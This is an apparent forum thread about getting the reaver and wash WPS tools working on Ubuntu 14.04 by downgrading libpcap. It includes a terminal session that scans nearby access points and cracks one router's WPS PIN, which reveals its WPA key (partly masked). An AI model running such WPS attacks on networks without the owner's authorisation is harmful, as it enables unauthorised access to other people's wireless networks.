Aircrack-ng forum
General Category => Useful stuff => Topic started by: Drehstuhlpilot on May 31, 2014, 05:16:31 pm
-
Hello everybody,
currently, my Alfa AWUS036NHR is not quite doing what I want it to do. While I can perfectly scan for APs and also can connect, strings like wash are not working. Moreover, while I try to reaver, I'm always getting a 'failed to associate'. Regardless of the configuration of the rouger. Somehow, the problem seems to be on my end, not on the router's.
But first, here are some information:
Wifi adapter: Alfa AWUS026NHR
System: Linux Ubuntu 14.04LTS
lsusb
Bus 002 Device 004: ID 0a5c:219a Broadcom Corp.
Bus 002 Device 005: ID 0bda:817f Realtek Semiconductor Corp. RTL8188RU 802.11n WLAN Adapter
Bus 002 Device 003: ID 04b4:6560 Cypress Semiconductor Corp. CY7C65640 USB-2.0 "TetraHub"
Bus 002 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 003: ID 2232:1009
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
lsmod
Module Size Used by
hid_apple 13386 0
hidp 23870 1
snd_hda_codec_hdmi 46207 1
snd_hda_codec_realtek 61438 1
rfcomm 69160 8
bnep 19624 2
nls_iso8859_1 12713 1
arc4 12608 4
brcmsmac 563041 0
cordic 12574 1 brcmsmac
brcmutil 15618 1 brcmsmac
b43 387371 0
rtl8192cu 67723 0
rtl_usb 18448 1 rtl8192cu
rtlwifi 63475 2 rtl_usb,rtl8192cu
rtl8192c_common 53172 1 rtl8192cu
mac80211 626489 5 b43,brcmsmac,rtl_usb,rtlwifi,rtl8192cu
cfg80211 484040 4 b43,brcmsmac,mac80211,rtlwifi
ssb 62379 1 b43
intel_rapl 18773 0
x86_pkg_temp_thermal 14205 0
intel_powerclamp 14705 0
coretemp 13435 0
kvm_intel 143060 0
kvm 451511 1 kvm_intel
crct10dif_pclmul 14289 0
crc32_pclmul 13113 0
uvcvideo 80885 0
videobuf2_vmalloc 13216 1 uvcvideo
videobuf2_memops 13362 1 videobuf2_vmalloc
videobuf2_core 40664 1 uvcvideo
ghash_clmulni_intel 13259 0
aesni_intel 55624 0
videodev 134688 2 uvcvideo,videobuf2_core
aes_x86_64 17131 1 aesni_intel
lrw 13286 1 aesni_intel
gf128mul 14951 1 lrw
glue_helper 13990 1 aesni_intel
ablk_helper 13597 1 aesni_intel
cryptd 20359 3 ghash_clmulni_intel,aesni_intel,ablk_helper
btusb 32412 0
bluetooth 395423 27 bnep,hidp,btusb,rfcomm
snd_hda_intel 52355 3
snd_hda_codec 192906 3 snd_hda_codec_realtek,snd_hda_codec_hdmi,snd_hda_intel
snd_hwdep 13602 1 snd_hda_codec
snd_pcm 102099 3 snd_hda_codec_hdmi,snd_hda_codec,snd_hda_intel
snd_page_alloc 18710 2 snd_pcm,snd_hda_intel
snd_seq_midi 13324 0
snd_seq_midi_event 14899 1 snd_seq_midi
snd_rawmidi 30144 1 snd_seq_midi
joydev 17381 0
serio_raw 13462 0
snd_seq 61560 2 snd_seq_midi_event,snd_seq_midi
snd_seq_device 14497 3 snd_seq,snd_rawmidi,snd_seq_midi
snd_timer 29482 2 snd_pcm,snd_seq
bcma 52096 3 b43,brcmsmac
snd 69238 17 snd_hda_codec_realtek,snd_hwdep,snd_timer,snd_hda_codec_hdmi,snd_pcm,snd_seq,snd_rawmidi,snd_hda_codec,snd_hda_intel,snd_seq_device,snd_seq_midi
i915 783485 4
lpc_ich 21080 0
drm_kms_helper 52758 1 i915
soundcore 12680 1 snd
mei_me 18627 0
mei 82274 1 mei_me
drm 302817 5 i915,drm_kms_helper
i2c_algo_bit 13413 1 i915
wmi 19177 0
parport_pc 32701 0
video 19476 1 i915
mac_hid 13205 0
ppdev 17671 0
lp 17759 0
parport 42348 3 lp,ppdev,parport_pc
hid_logitech_dj 18581 0
usbhid 52616 0
hid 106148 5 hidp,usbhid,hid_logitech_dj,hid_apple
psmouse 102222 0
ahci 25819 3
libahci 32168 1 ahci
r8169 67581 0
mii 13934 1 r8169
rfkill list
0: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
1: phy1: Wireless LAN
Soft blocked: no
Hard blocked: no
2: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
iwconfig
wlan1 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr=2347 B Fragment thr:off
Power Management:off
eth0 no wireless extensions.
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
sudo iwlist scan
wlan1 Scan completed :
Cell 01 - Address: xy:xy:xy:xy:xy:xy
Channel:5
Frequency:2.432 GHz (Channel 5)
Quality=50/70 Signal level=-60 dBm
Encryption key:on
ESSID:"blubb"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master
Extra:tsf=000000006ed7984f
Extra: Last beacon: 4ms ago
IE: Unknown: 00084861757337323730
IE: Unknown: 010882848B960C121824
IE: Unknown: 030105
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : CCMP
Authentication Suites (1) : PSK
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: Unknown: DD180050F20201018F0003A4000027A4000042435E0062322F00
IE: Unknown: 2D1A4C101BFFFF000000000000000000000000000000000000000000
IE: Unknown: 3D1605080800000000000000000000000000000000000000
IE: Unknown: DD0900037F01010000FF7F
IE: Unknown: DD0A00037F04010001000000
IE: Unknown: DD0C00040E010102010000000000
eth0 Interface doesn't support scanning.
lo Interface doesn't support scanning.
wlan0 No scan results
Any suggestions?
Thanks!
-
Hi Drehstuhlpilot,
while I try to reaver, I'm always getting a 'failed to associate'.
- Reaver does not compile correctly and does not work properly from Ubuntu version 12.04+ and higher.
- The original project seems to be abandoned and was created a fork (Reaver-wps-fork (https://code.google.com/p/reaver-wps-fork/)) to continue the project, but still does not work on Ubuntu 14.04.
- If you want to compile/use Reaver try to revert/install also GCC and G++ 4.6 version.
(Ubuntu 14.04 use 4.8 )
Bye Jano
-
i am using reaver under xubuntu 14.04 with aircrack-ng already installed
i had to add the following packages
sudo apt-get install libsqlite3-devsudo apt-get install libpcap0.8-dev
I had got some error message while compiling and installing.
I did it some days ago , i don't have this messages anymore...
I remember that after "make install" i got in the shell a loop, like if this loop went to stdout instead of being executed... ???
Reaver works correctly but wash stop immediately and doesn't shows any AP.
I guess it is because i installed the packages while i was compiling and with a clean install with the dependencies already installed it should come out better
- The original project seems to be abandoned and was created a fork (Reaver-wps-fork) to continue the project, but still does not work on Ubuntu 14.04.
Thanks for the information.
It is a shame or I am blind but I don't see any changelog or any explanation about the code of this fork... :-\
-edit-
Ok, i was blind... :P
(http://pix.toile-libre.org/upload/original/1401781857.png)
it seems to be focused on the output and on preventing the "99,99%" bug and the author says that no further changes will be made.
-
- SOLUTION FOR REAVER IN UBUNTU 14.04 and DERIVATED ( solution tryed in Xubuntu 14.04
Yesterday i had some time to try to fix reaver in Xubutu 14.04 ( wash did not even start and reaver was unable to handle connexion to send properly just a single PIN )
I found quite quickly my way thanks to this topic in reaver' webpage : Issue 630: Can't associate and test wps pins with "newer" kernel versions (http://code.google.com/p/reaver-wps/issues/detail?id=630)
Despite what may suggest the tittle, it is not a kernel issue but an issue with libpcap.0.8
To solve the issue, just follow this, as suggested by johnsmit...@gmail.com at https://code.google.com/p/reaver-wps/wiki/README:
"Hello guys/gals, this is not a reaver problem. This is output:libpcap0.8:i386 1.5.3-2, does not work for reaver/wash and must be downgraded to libpcap0.8:i386 1.4.0-2.
use wget: wget http://mirrors.kernel.org/ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_i386.deb http://mirrors.kernel.org/ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.4.0-2_i386.deb
then install: sudo dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb Note: if you have a 64bit OS, then change out to: libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb
then: sudo dpkg -i libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb "
I used a 64 bits xubuntu and the solution worked fine...
kcdtv@N0nam34u:~$ uname -a
Linux N0nam34u 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
kcdtv@N0nam34u:~$ sudo airmon-zc start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
830 NetworkManager
1122 wpa_supplicant
1125 dhclient
2060 avahi-daemon
2061 avahi-daemon
PHY Interface Driver Chipset
phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
sudo wash -i wlan0mon -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
20:89:86:@@@@@ 1 -72 1.0 No JAZZ@@@@@
F0:84:C9:@@@@@ 1 -33 1.0 No JAZZ@@@@@
00:1A:2B:@@@@@ 1 -75 1.0 No WLA@@@@@
B8:55:10:@@@@@ 2 -42 1.0 No WAN@@@@@
00:19:70:@@@@@ 6 -69 1.0 Yes Ora@@@@@
00:13:F7:@@@@@ 7 -74 1.0 No WLA@@@@@
00:18:E7:@@@@@ 9 -69 1.0 No ONO@@@@@
^Ckcdtv@N0nam34u:~$ sudo reaver -i wlan0mon -b F0:84:C9:@@@@@ -vv -d 0
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from F0:84:C9:@@@@@
[+] Switching wlan0mon to channel 1
[+] Associated with F0:84:C9:@@@@@ (ESSID: JAZZ@@@@@)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: '@@@@@@@@@@@@@@@@@@@@'
[+] AP SSID: 'JAZZ@@@@@'
[+] Nothing done, nothing to save.
kcdtv@N0nam34u:~$
And everything is back to normal, a cople of second to get the WPA key if you enable your WPS AP with PIN 12345670 with a very clean process.
it worked by Just overwritting the current library with the one you download from wget
wget http://mirrors.kernel.org/ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_amd64.deb
sudo dpkg -i libpcap0.8_1.4.0-2_i386.deb
Although i preferred to unsintall reaver an install it again with library already changed, but the lazy way seemed to work fine
Aircrack-ng still works fine, airodump-ng does not have channel issue, It didn't break anything as far as i can see...
PS: if the fact to "make a up" in a topic is a problem, please excuse me.
-
Libcap is no longer kept there. It has valid mirrors here though:
http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/
-
-Fixing WPS on Newer version's of BackBox by downgrading to libpcap 1.4
wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_amd64.deb
wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.4.0-2_amd64.deb
dpkg -i libpcap0.8_1.4.0-2_amd64.deb libpcap0.8-dev_1.4.0-2_amd64.deb
Reinstall Reaver and make reaver folder in etc if not there and wps will work as well as handshake cap.
If fixing an i386 then replace all _amd64.deb to _i386.deb
wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8_1.4.0-2_i386.deb
wget http://mirror.esc7.net/pub/Ubuntu/pool/main/libp/libpcap/libpcap0.8-dev_1.4.0-2_i386.deb
dpkg -i libpcap0.8_1.4.0-2_i386.deb libpcap0.8-dev_1.4.0-2_i386.deb
I just wanted make an correction/update for the libpcap fix with the mirror change for oct-2015 to make it a little easier for those who didn't understand much more then how to copy and paste.